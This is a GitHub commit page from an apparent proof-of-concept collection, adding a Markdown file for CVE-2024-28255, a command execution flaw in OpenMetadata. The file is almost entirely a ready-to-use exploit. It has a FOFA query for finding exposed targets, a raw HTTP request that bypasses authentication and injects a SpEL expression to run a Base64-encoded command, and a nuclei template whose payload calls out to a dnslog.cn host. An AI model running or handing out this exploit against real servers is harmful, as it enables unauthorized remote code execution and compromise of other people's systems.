admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create OpenMetadata命令执行(CVE-2024-28255).md

Browse Source
This commit is contained in:
wy876 2024-04-14 19:22:08 +08:00 committed by GitHub
parent bf0b3a2cd3
commit 3bb0519b02
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 53 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

53
OpenMetadata命令执行(CVE-2024-28255).md Normal file
View File

@ -0,0 +1,53 @@
## OpenMetadata命令执行(CVE-2024-28255)
## fofa
```
icon_hash="733091897"
```
## poc
```
GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22Base64编码命令%22))) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Connection: close
Accept-Encoding: gzip
```
![78d091e4fbeaf6007c6605c09ff4025d](https://github.com/wy876/POC/assets/139549762/977f9bcb-c7f7-4a73-9918-9c06844c1436)
## nuclei POC
```
id: CVE-2024-28255
info:
name: CVE-2024-28255
author: xiaoming
severity: high
description: OpenMetadata Command Execution
metadata:
max-request: 1
shodan-query: ""
verified: true
http:
- raw:
- |+
GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgdGVzdC5kbnNsb2cuY24=%22))) HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Connection: close
Accept-Encoding: gzip
redirects: true
matchers-condition: and
matchers:
- id: 1
type: word
part: body
words:
- "400"
- java.lang.ProcessImpl
condition: and
```